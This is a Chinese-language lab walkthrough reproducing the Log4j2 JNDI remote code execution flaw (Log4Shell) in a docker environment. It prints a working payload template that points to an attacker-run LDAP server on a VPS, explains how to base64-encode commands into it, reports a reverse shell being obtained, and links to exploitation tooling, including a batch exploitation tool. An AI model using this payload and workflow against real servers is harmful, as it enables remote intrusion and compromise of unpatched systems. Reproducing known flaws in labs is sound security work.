漏洞描述
Apache Log4j2某些功能存在遞回決議功能,攻擊者可直接構造惡意請求,觸發遠程代碼執行漏洞,Spring-Boot-strater-log4j2、Apache Struts2、Apache Solr、Apache Flink、Apache Druid、ElasticSearch、Flume、Dubbo、Redis、Logstash、Kafka均受影響,
影響范圍:
Apache Log4j 2.x < 2.15.0-rc2
漏洞復現:
使用Log4j2漏洞環境進行復現,環境下載地址:https://github.com/fengxuangit/log4j_vuln
docker創建環境命令:
docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln docker exec -it log4j_vuln_container /bin/bash /bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh
使用本地kali服務器docker拉取環境,
環境啟動成功后,訪問http://127.0.0.1/webstudy/hello-fengxuan,漏洞post引數為c,
漏洞環境部署完畢,開始漏洞復現,首先需要一臺公網vps(起ldap服務、接受反彈shell),
vps起ldap服務,工具地址:https://github.com/feihong-cs/JNDIExploit(好多復現程序中遇到jdk版本不加載惡意類的情況,導致漏洞無法復現,github有能生成能繞過JDK限制JNDI鏈接的工具,大家可以使用試試),
ldap服務啟動之后,去抓包發送payload,把要執行的命令base64加密后放入payload中,
先創建一個檔案touch /tmp/123 發送payload,
payload為 ${jndi:ldap://x:x:x:x:1389/Basic/Command/base64命令}
vps上的 JNDIExploit監聽已經接收到了惡意請求,
查看docker鏡像/tmp路徑,123檔案創建成功,
反彈shell同理,將反彈shell命令base64加密后放入payload發送,
反彈shell成功,
最后附一款GUI工具,專案地址:GitHub - inbug-team/Log4j_RCE_Tool: Log4j 多執行緒批量檢測利用工具
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/379406.html
標籤:其他
上一篇:log4j2史詩級漏洞攻擊重現